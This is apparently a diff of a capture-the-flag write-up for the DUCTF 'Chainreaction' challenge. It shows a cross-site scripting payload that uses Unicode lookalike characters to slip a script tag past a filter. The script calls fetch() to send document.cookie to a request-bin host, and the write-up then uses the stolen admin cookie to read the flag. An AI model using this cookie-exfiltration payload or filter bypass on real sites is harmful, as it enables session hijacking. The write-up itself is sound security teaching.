L-Bot-AU/DUCTF-Write-Ups/Chainreaction/solution.md

 ```
 "＞＜scᴿipt＞ fetch(`https://[my_bin].x.pipedream.net/c=${document.cookie}`)＜/scᴿipt＞
 ```
-Then, after retrieving the cookie **sup3rs3cur34dm1nc00k13**, we can set it on our browser and visit the `/admin` page to read the flag.
+Then, after retrieving the cookie **sup3rs3cur34dm1nc00k13**, we can set it on our browser and visit the `/admin` page to read the flag.<br>
 Flag: **DUCTF{\_un1c0de\_bypass_x55_ftw!}**